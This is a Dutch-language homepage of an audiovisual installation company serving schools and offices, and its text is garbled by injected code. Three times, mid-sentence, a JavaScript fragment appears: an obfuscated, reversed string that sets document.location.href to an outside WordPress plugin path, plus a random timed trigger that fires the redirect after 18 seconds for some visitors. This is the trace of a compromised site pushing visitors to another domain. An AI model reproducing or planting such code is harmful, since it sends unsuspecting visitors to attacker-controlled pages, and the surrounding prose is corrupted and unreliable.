Welkom

Welkom op de site van Alpha Werken

Alpha Werken is een dynamisch bedrijf dat zich heeft gespecialiseerd in het integreren van audiovisuele systemen voor voornamelijk scholen en bedrijfspresentatieruimtes. Wij leveren en installeren digitale schoolborden, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touchscreenschermen en beamers en gaan niet weg voordat alles werkt zoals u graag wilt. En mocht het nodig zijn komen wij graag langs voor onderhoud en reparatie. Eén telefoontje of e-mailtje is voldoende.

Bij een bedrijf ter groote van Alpha Werken krijgt u betaalbare, persoonlijke service op maat op een tijdstip dat het u uitkomt! Ook buiten school- en kantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tooruren zodat uw werkzaamheden gewoon doorgang kunnen vinden. Met één aanspreekpunt zodat u direct weet waar u aan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe bent.

U kunt lezen welke tevreden klanten u voor gingen bij reacties van klanten. En mocht u vragen hebben schroom niet om contact met ons op te nemen. Wij helpen u graag!